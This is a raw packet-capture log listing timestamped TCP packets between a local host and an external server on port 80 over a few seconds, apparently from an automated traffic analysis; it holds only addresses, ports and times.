May 28, 2023 09:29:44.148560047 CEST	49720	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:44.149048090 CEST	49720	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:44.149143934 CEST	49720	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:44.205854893 CEST	80	49720	193.106.175.215	192.168.2.5
May 28, 2023 09:29:44.205885887 CEST	80	49720	193.106.175.215	192.168.2.5
May 28, 2023 09:29:44.243608952 CEST	80	49720	193.106.175.215	192.168.2.5
May 28, 2023 09:29:44.243830919 CEST	49720	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:44.243954897 CEST	49720	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:44.252705097 CEST	49721	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:44.301170111 CEST	80	49720	193.106.175.215	192.168.2.5
May 28, 2023 09:29:44.316871881 CEST	80	49721	193.106.175.215	192.168.2.5
May 28, 2023 09:29:44.317147970 CEST	49721	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:44.317657948 CEST	49721	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:44.317703009 CEST	49721	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:44.381526947 CEST	80	49721	193.106.175.215	192.168.2.5
May 28, 2023 09:29:44.381563902 CEST	80	49721	193.106.175.215	192.168.2.5
May 28, 2023 09:29:44.381582975 CEST	80	49721	193.106.175.215	192.168.2.5
May 28, 2023 09:29:44.412874937 CEST	80	49721	193.106.175.215	192.168.2.5
May 28, 2023 09:29:44.412929058 CEST	80	49721	193.106.175.215	192.168.2.5
May 28, 2023 09:29:44.413012028 CEST	49721	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:44.413147926 CEST	49721	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:44.421328068 CEST	49722	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:44.476389885 CEST	80	49721	193.106.175.215	192.168.2.5
May 28, 2023 09:29:44.481693029 CEST	80	49722	193.106.175.215	192.168.2.5
May 28, 2023 09:29:44.481960058 CEST	49722	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:44.482593060 CEST	49722	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:44.482687950 CEST	49722	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:44.542809010 CEST	80	49722	193.106.175.215	192.168.2.5
May 28, 2023 09:29:44.542844057 CEST	80	49722	193.106.175.215	192.168.2.5
May 28, 2023 09:29:44.542859077 CEST	80	49722	193.106.175.215	192.168.2.5
May 28, 2023 09:29:44.596837997 CEST	80	49722	193.106.175.215	192.168.2.5
May 28, 2023 09:29:44.597019911 CEST	49722	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:44.597177982 CEST	49722	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:44.605460882 CEST	49723	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:44.656954050 CEST	80	49722	193.106.175.215	192.168.2.5
May 28, 2023 09:29:44.669126987 CEST	80	49723	193.106.175.215	192.168.2.5
May 28, 2023 09:29:44.669336081 CEST	49723	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:44.669718027 CEST	49723	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:44.669770002 CEST	49723	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:44.732845068 CEST	80	49723	193.106.175.215	192.168.2.5
May 28, 2023 09:29:44.732877970 CEST	80	49723	193.106.175.215	192.168.2.5
May 28, 2023 09:29:44.761943102 CEST	80	49723	193.106.175.215	192.168.2.5
May 28, 2023 09:29:44.762083054 CEST	49723	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:44.762176037 CEST	49723	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:44.789670944 CEST	49724	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:44.825838089 CEST	80	49723	193.106.175.215	192.168.2.5
May 28, 2023 09:29:44.849833012 CEST	80	49724	193.106.175.215	192.168.2.5
May 28, 2023 09:29:44.850080967 CEST	49724	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:44.852670908 CEST	49724	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:44.852709055 CEST	49724	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:44.912784100 CEST	80	49724	193.106.175.215	192.168.2.5
May 28, 2023 09:29:44.913275003 CEST	80	49724	193.106.175.215	192.168.2.5
May 28, 2023 09:29:44.965430975 CEST	80	49724	193.106.175.215	192.168.2.5
May 28, 2023 09:29:44.965600967 CEST	49724	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:44.965704918 CEST	49724	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:44.972654104 CEST	49725	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:45.025377989 CEST	80	49724	193.106.175.215	192.168.2.5
May 28, 2023 09:29:45.029098988 CEST	80	49725	193.106.175.215	192.168.2.5
May 28, 2023 09:29:45.029314041 CEST	49725	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:45.029692888 CEST	49725	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:45.029733896 CEST	49725	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:45.085875034 CEST	80	49725	193.106.175.215	192.168.2.5
May 28, 2023 09:29:45.085912943 CEST	80	49725	193.106.175.215	192.168.2.5
May 28, 2023 09:29:45.086113930 CEST	80	49725	193.106.175.215	192.168.2.5
May 28, 2023 09:29:45.137706041 CEST	80	49725	193.106.175.215	192.168.2.5
May 28, 2023 09:29:45.137751102 CEST	80	49725	193.106.175.215	192.168.2.5
May 28, 2023 09:29:45.137932062 CEST	49725	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:45.138096094 CEST	49725	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:45.149230957 CEST	49726	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:45.193702936 CEST	80	49725	193.106.175.215	192.168.2.5
May 28, 2023 09:29:45.209063053 CEST	80	49726	193.106.175.215	192.168.2.5
May 28, 2023 09:29:45.209187031 CEST	49726	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:45.209572077 CEST	49726	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:45.209633112 CEST	49726	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:45.269737959 CEST	80	49726	193.106.175.215	192.168.2.5
May 28, 2023 09:29:45.269870996 CEST	80	49726	193.106.175.215	192.168.2.5
May 28, 2023 09:29:45.269937992 CEST	80	49726	193.106.175.215	192.168.2.5
May 28, 2023 09:29:45.300324917 CEST	80	49726	193.106.175.215	192.168.2.5
May 28, 2023 09:29:45.300379038 CEST	80	49726	193.106.175.215	192.168.2.5
May 28, 2023 09:29:45.300615072 CEST	49726	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:45.300782919 CEST	49726	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:45.311408997 CEST	49727	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:45.360445976 CEST	80	49726	193.106.175.215	192.168.2.5
May 28, 2023 09:29:45.375118971 CEST	80	49727	193.106.175.215	192.168.2.5
May 28, 2023 09:29:45.375518084 CEST	49727	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:45.376451015 CEST	49727	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:45.376578093 CEST	49727	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:45.439847946 CEST	80	49727	193.106.175.215	192.168.2.5
May 28, 2023 09:29:45.440175056 CEST	80	49727	193.106.175.215	192.168.2.5
May 28, 2023 09:29:45.475369930 CEST	80	49727	193.106.175.215	192.168.2.5
May 28, 2023 09:29:45.475496054 CEST	49727	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:45.475656986 CEST	49727	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:45.497597933 CEST	49728	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:45.538779020 CEST	80	49727	193.106.175.215	192.168.2.5
May 28, 2023 09:29:45.562350035 CEST	80	49728	193.106.175.215	192.168.2.5
May 28, 2023 09:29:45.562494040 CEST	49728	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:45.562896013 CEST	49728	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:45.562954903 CEST	49728	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:45.623090029 CEST	80	49728	193.106.175.215	192.168.2.5
May 28, 2023 09:29:45.623822927 CEST	80	49728	193.106.175.215	192.168.2.5
May 28, 2023 09:29:45.649214029 CEST	80	49728	193.106.175.215	192.168.2.5
May 28, 2023 09:29:45.649470091 CEST	49728	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:45.649604082 CEST	49728	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:45.665183067 CEST	49729	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:45.709930897 CEST	80	49728	193.106.175.215	192.168.2.5
May 28, 2023 09:29:45.725337029 CEST	80	49729	193.106.175.215	192.168.2.5
May 28, 2023 09:29:45.725594044 CEST	49729	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:45.725951910 CEST	49729	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:45.726010084 CEST	49729	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:45.786382914 CEST	80	49729	193.106.175.215	192.168.2.5
May 28, 2023 09:29:45.786429882 CEST	80	49729	193.106.175.215	192.168.2.5
May 28, 2023 09:29:45.786587000 CEST	80	49729	193.106.175.215	192.168.2.5
May 28, 2023 09:29:45.814913034 CEST	80	49729	193.106.175.215	192.168.2.5
May 28, 2023 09:29:45.815088034 CEST	49729	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:45.815790892 CEST	49729	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:45.823580980 CEST	49730	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:45.875500917 CEST	80	49729	193.106.175.215	192.168.2.5
May 28, 2023 09:29:45.884032965 CEST	80	49730	193.106.175.215	192.168.2.5
May 28, 2023 09:29:45.884249926 CEST	49730	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:45.894476891 CEST	49730	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:45.894622087 CEST	49730	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:45.954741955 CEST	80	49730	193.106.175.215	192.168.2.5
May 28, 2023 09:29:45.954773903 CEST	80	49730	193.106.175.215	192.168.2.5
May 28, 2023 09:29:45.954838991 CEST	80	49730	193.106.175.215	192.168.2.5
May 28, 2023 09:29:46.011310101 CEST	80	49730	193.106.175.215	192.168.2.5
May 28, 2023 09:29:46.011390924 CEST	49730	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:46.011483908 CEST	49730	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:46.019284010 CEST	49731	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:46.071732044 CEST	80	49730	193.106.175.215	192.168.2.5
May 28, 2023 09:29:46.079608917 CEST	80	49731	193.106.175.215	192.168.2.5
May 28, 2023 09:29:46.079734087 CEST	49731	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:46.080209017 CEST	49731	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:46.080291033 CEST	49731	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:46.140345097 CEST	80	49731	193.106.175.215	192.168.2.5
May 28, 2023 09:29:46.140383959 CEST	80	49731	193.106.175.215	192.168.2.5
May 28, 2023 09:29:46.140409946 CEST	80	49731	193.106.175.215	192.168.2.5
May 28, 2023 09:29:46.193716049 CEST	80	49731	193.106.175.215	192.168.2.5
May 28, 2023 09:29:46.193890095 CEST	49731	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:46.194545031 CEST	49731	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:46.214262962 CEST	49732	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:46.254209042 CEST	80	49731	193.106.175.215	192.168.2.5
May 28, 2023 09:29:46.271012068 CEST	80	49732	193.106.175.215	192.168.2.5
May 28, 2023 09:29:46.271215916 CEST	49732	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:46.271675110 CEST	49732	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:46.271754980 CEST	49732	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:46.327970028 CEST	80	49732	193.106.175.215	192.168.2.5
May 28, 2023 09:29:46.327996016 CEST	80	49732	193.106.175.215	192.168.2.5
May 28, 2023 09:29:46.328013897 CEST	80	49732	193.106.175.215	192.168.2.5
May 28, 2023 09:29:46.388382912 CEST	80	49732	193.106.175.215	192.168.2.5
May 28, 2023 09:29:46.388418913 CEST	80	49732	193.106.175.215	192.168.2.5
May 28, 2023 09:29:46.388539076 CEST	49732	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:46.388636112 CEST	49732	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:46.395586967 CEST	49733	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:46.444732904 CEST	80	49732	193.106.175.215	192.168.2.5
May 28, 2023 09:29:46.452486992 CEST	80	49733	193.106.175.215	192.168.2.5
May 28, 2023 09:29:46.452604055 CEST	49733	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:46.453111887 CEST	49733	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:46.453183889 CEST	49733	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:46.509682894 CEST	80	49733	193.106.175.215	192.168.2.5
May 28, 2023 09:29:46.509790897 CEST	80	49733	193.106.175.215	192.168.2.5
May 28, 2023 09:29:46.509979963 CEST	80	49733	193.106.175.215	192.168.2.5
May 28, 2023 09:29:46.567115068 CEST	80	49733	193.106.175.215	192.168.2.5
May 28, 2023 09:29:46.567255974 CEST	49733	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:46.584423065 CEST	49733	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:46.595690966 CEST	49734	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:46.640933990 CEST	80	49733	193.106.175.215	192.168.2.5
May 28, 2023 09:29:46.656738043 CEST	80	49734	193.106.175.215	192.168.2.5
May 28, 2023 09:29:46.656986952 CEST	49734	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:46.658704042 CEST	49734	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:46.658767939 CEST	49734	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:46.719120979 CEST	80	49734	193.106.175.215	192.168.2.5
May 28, 2023 09:29:46.719158888 CEST	80	49734	193.106.175.215	192.168.2.5
May 28, 2023 09:29:46.719325066 CEST	80	49734	193.106.175.215	192.168.2.5
May 28, 2023 09:29:46.747884989 CEST	80	49734	193.106.175.215	192.168.2.5
May 28, 2023 09:29:46.747956991 CEST	49734	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:46.748099089 CEST	49734	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:46.776806116 CEST	49735	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:46.808152914 CEST	80	49734	193.106.175.215	192.168.2.5
May 28, 2023 09:29:46.836489916 CEST	80	49735	193.106.175.215	192.168.2.5
May 28, 2023 09:29:46.836647034 CEST	49735	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:46.837074041 CEST	49735	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:46.837141991 CEST	49735	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:46.896508932 CEST	80	49735	193.106.175.215	192.168.2.5
May 28, 2023 09:29:46.896595955 CEST	80	49735	193.106.175.215	192.168.2.5
May 28, 2023 09:29:46.896703005 CEST	80	49735	193.106.175.215	192.168.2.5
May 28, 2023 09:29:46.932673931 CEST	80	49735	193.106.175.215	192.168.2.5
May 28, 2023 09:29:46.932862997 CEST	49735	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:46.946909904 CEST	49735	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:46.964813948 CEST	49736	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:47.006297112 CEST	80	49735	193.106.175.215	192.168.2.5
May 28, 2023 09:29:47.021684885 CEST	80	49736	193.106.175.215	192.168.2.5
May 28, 2023 09:29:47.021812916 CEST	49736	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:47.022289038 CEST	49736	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:47.022367001 CEST	49736	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:47.078948021 CEST	80	49736	193.106.175.215	192.168.2.5
May 28, 2023 09:29:47.078980923 CEST	80	49736	193.106.175.215	192.168.2.5
May 28, 2023 09:29:47.110063076 CEST	80	49736	193.106.175.215	192.168.2.5
May 28, 2023 09:29:47.110188961 CEST	49736	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:47.110349894 CEST	49736	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:47.118319988 CEST	49737	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:47.166455030 CEST	80	49736	193.106.175.215	192.168.2.5
May 28, 2023 09:29:47.178451061 CEST	80	49737	193.106.175.215	192.168.2.5
May 28, 2023 09:29:47.178644896 CEST	49737	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:47.179013014 CEST	49737	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:47.179066896 CEST	49737	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:47.238809109 CEST	80	49737	193.106.175.215	192.168.2.5
May 28, 2023 09:29:47.238915920 CEST	80	49737	193.106.175.215	192.168.2.5
May 28, 2023 09:29:47.278997898 CEST	80	49737	193.106.175.215	192.168.2.5
May 28, 2023 09:29:47.279074907 CEST	49737	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:47.279253960 CEST	49737	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:47.289551020 CEST	49738	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:47.338920116 CEST	80	49737	193.106.175.215	192.168.2.5
May 28, 2023 09:29:47.345597982 CEST	80	49738	193.106.175.215	192.168.2.5
May 28, 2023 09:29:47.345818996 CEST	49738	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:47.346288919 CEST	49738	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:47.346379042 CEST	49738	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:47.402209997 CEST	80	49738	193.106.175.215	192.168.2.5
May 28, 2023 09:29:47.402360916 CEST	80	49738	193.106.175.215	192.168.2.5
May 28, 2023 09:29:47.402379036 CEST	80	49738	193.106.175.215	192.168.2.5
May 28, 2023 09:29:47.458448887 CEST	80	49738	193.106.175.215	192.168.2.5
May 28, 2023 09:29:47.458653927 CEST	49738	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:47.458802938 CEST	49738	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:47.467641115 CEST	49739	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:47.514580011 CEST	80	49738	193.106.175.215	192.168.2.5
May 28, 2023 09:29:47.524298906 CEST	80	49739	193.106.175.215	192.168.2.5
May 28, 2023 09:29:47.524451017 CEST	49739	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:47.524866104 CEST	49739	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:47.524924040 CEST	49739	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:47.589484930 CEST	80	49739	193.106.175.215	192.168.2.5
May 28, 2023 09:29:47.648155928 CEST	80	49739	193.106.175.215	192.168.2.5
May 28, 2023 09:29:47.648293972 CEST	49739	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:47.648410082 CEST	49739	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:47.661138058 CEST	49740	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:47.704607964 CEST	80	49739	193.106.175.215	192.168.2.5
May 28, 2023 09:29:47.721641064 CEST	80	49740	193.106.175.215	192.168.2.5
May 28, 2023 09:29:47.721785069 CEST	49740	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:47.722225904 CEST	49740	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:47.722302914 CEST	49740	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:47.782869101 CEST	80	49740	193.106.175.215	192.168.2.5
May 28, 2023 09:29:47.783000946 CEST	80	49740	193.106.175.215	192.168.2.5
May 28, 2023 09:29:47.783287048 CEST	80	49740	193.106.175.215	192.168.2.5
May 28, 2023 09:29:47.840580940 CEST	80	49740	193.106.175.215	192.168.2.5
May 28, 2023 09:29:47.840749979 CEST	49740	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:47.840878010 CEST	49740	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:47.848294973 CEST	49741	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:47.901072979 CEST	80	49740	193.106.175.215	192.168.2.5
May 28, 2023 09:29:47.912240982 CEST	80	49741	193.106.175.215	192.168.2.5
May 28, 2023 09:29:47.912400961 CEST	49741	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:47.918241978 CEST	49741	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:47.918301105 CEST	49741	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:47.982163906 CEST	80	49741	193.106.175.215	192.168.2.5
May 28, 2023 09:29:47.982198954 CEST	80	49741	193.106.175.215	192.168.2.5
May 28, 2023 09:29:47.982215881 CEST	80	49741	193.106.175.215	192.168.2.5
May 28, 2023 09:29:48.013151884 CEST	80	49741	193.106.175.215	192.168.2.5
May 28, 2023 09:29:48.013267040 CEST	49741	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:48.013374090 CEST	49741	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:48.023425102 CEST	49742	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:48.076598883 CEST	80	49741	193.106.175.215	192.168.2.5
May 28, 2023 09:29:48.079704046 CEST	80	49742	193.106.175.215	192.168.2.5
May 28, 2023 09:29:48.079893112 CEST	49742	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:48.080434084 CEST	49742	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:48.080657005 CEST	49742	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:48.136742115 CEST	80	49742	193.106.175.215	192.168.2.5
May 28, 2023 09:29:48.136785030 CEST	80	49742	193.106.175.215	192.168.2.5
May 28, 2023 09:29:48.136902094 CEST	80	49742	193.106.175.215	192.168.2.5
May 28, 2023 09:29:48.164910078 CEST	80	49742	193.106.175.215	192.168.2.5
May 28, 2023 09:29:48.165126085 CEST	49742	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:48.165252924 CEST	49742	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:48.174885988 CEST	49743	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:48.221792936 CEST	80	49742	193.106.175.215	192.168.2.5
May 28, 2023 09:29:48.232232094 CEST	80	49743	193.106.175.215	192.168.2.5
May 28, 2023 09:29:48.232345104 CEST	49743	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:48.232814074 CEST	49743	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:48.232891083 CEST	49743	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:48.291501045 CEST	80	49743	193.106.175.215	192.168.2.5
May 28, 2023 09:29:48.291642904 CEST	80	49743	193.106.175.215	192.168.2.5
May 28, 2023 09:29:48.321027040 CEST	80	49743	193.106.175.215	192.168.2.5
May 28, 2023 09:29:48.321285963 CEST	49743	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:48.321403980 CEST	49743	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:48.335136890 CEST	49744	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:48.377775908 CEST	80	49743	193.106.175.215	192.168.2.5
May 28, 2023 09:29:48.394942045 CEST	80	49744	193.106.175.215	192.168.2.5
May 28, 2023 09:29:48.395221949 CEST	49744	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:48.395708084 CEST	49744	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:48.395772934 CEST	49744	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:48.455319881 CEST	80	49744	193.106.175.215	192.168.2.5
May 28, 2023 09:29:48.455353022 CEST	80	49744	193.106.175.215	192.168.2.5
May 28, 2023 09:29:48.455369949 CEST	80	49744	193.106.175.215	192.168.2.5
May 28, 2023 09:29:48.511517048 CEST	80	49744	193.106.175.215	192.168.2.5
May 28, 2023 09:29:48.511792898 CEST	49744	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:48.511917114 CEST	49744	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:48.520941019 CEST	49745	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:48.571423054 CEST	80	49744	193.106.175.215	192.168.2.5
May 28, 2023 09:29:48.581279993 CEST	80	49745	193.106.175.215	192.168.2.5
May 28, 2023 09:29:48.581423044 CEST	49745	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:48.581904888 CEST	49745	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:48.581975937 CEST	49745	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:48.642149925 CEST	80	49745	193.106.175.215	192.168.2.5
May 28, 2023 09:29:48.642193079 CEST	80	49745	193.106.175.215	192.168.2.5
May 28, 2023 09:29:48.642205000 CEST	80	49745	193.106.175.215	192.168.2.5
May 28, 2023 09:29:48.674067020 CEST	80	49745	193.106.175.215	192.168.2.5
May 28, 2023 09:29:48.674267054 CEST	49745	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:48.674447060 CEST	49745	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:48.683763981 CEST	49746	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:48.734014034 CEST	80	49745	193.106.175.215	192.168.2.5
May 28, 2023 09:29:48.741389990 CEST	80	49746	193.106.175.215	192.168.2.5
May 28, 2023 09:29:48.741596937 CEST	49746	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:48.741959095 CEST	49746	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:48.742017984 CEST	49746	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:48.798755884 CEST	80	49746	193.106.175.215	192.168.2.5
May 28, 2023 09:29:48.798791885 CEST	80	49746	193.106.175.215	192.168.2.5
May 28, 2023 09:29:48.834235907 CEST	80	49746	193.106.175.215	192.168.2.5
May 28, 2023 09:29:48.834407091 CEST	49746	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:48.834563017 CEST	49746	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:48.843163013 CEST	49747	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:48.891119957 CEST	80	49746	193.106.175.215	192.168.2.5
May 28, 2023 09:29:48.900496960 CEST	80	49747	193.106.175.215	192.168.2.5
May 28, 2023 09:29:48.900736094 CEST	49747	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:48.901222944 CEST	49747	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:48.901295900 CEST	49747	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:48.957612991 CEST	80	49747	193.106.175.215	192.168.2.5
May 28, 2023 09:29:48.958168983 CEST	80	49747	193.106.175.215	192.168.2.5
May 28, 2023 09:29:48.958189964 CEST	80	49747	193.106.175.215	192.168.2.5
May 28, 2023 09:29:49.000083923 CEST	80	49747	193.106.175.215	192.168.2.5
May 28, 2023 09:29:49.000248909 CEST	49747	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:49.000449896 CEST	49747	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:49.015434027 CEST	49748	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:49.056602955 CEST	80	49747	193.106.175.215	192.168.2.5
May 28, 2023 09:29:49.072288990 CEST	80	49748	193.106.175.215	192.168.2.5
May 28, 2023 09:29:49.074559927 CEST	49748	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:49.074559927 CEST	49748	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:49.074559927 CEST	49748	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:49.131949902 CEST	80	49748	193.106.175.215	192.168.2.5
May 28, 2023 09:29:49.131992102 CEST	80	49748	193.106.175.215	192.168.2.5
May 28, 2023 09:29:49.132009983 CEST	80	49748	193.106.175.215	192.168.2.5
May 28, 2023 09:29:49.186847925 CEST	80	49748	193.106.175.215	192.168.2.5
May 28, 2023 09:29:49.187033892 CEST	49748	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:49.187160015 CEST	49748	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:49.207331896 CEST	49749	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:49.243798018 CEST	80	49748	193.106.175.215	192.168.2.5
May 28, 2023 09:29:49.271713018 CEST	80	49749	193.106.175.215	192.168.2.5
May 28, 2023 09:29:49.271938086 CEST	49749	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:49.298521042 CEST	49749	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:49.298594952 CEST	49749	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:49.362713099 CEST	80	49749	193.106.175.215	192.168.2.5
May 28, 2023 09:29:49.362833977 CEST	80	49749	193.106.175.215	192.168.2.5
May 28, 2023 09:29:49.362859011 CEST	80	49749	193.106.175.215	192.168.2.5
May 28, 2023 09:29:49.419622898 CEST	80	49749	193.106.175.215	192.168.2.5
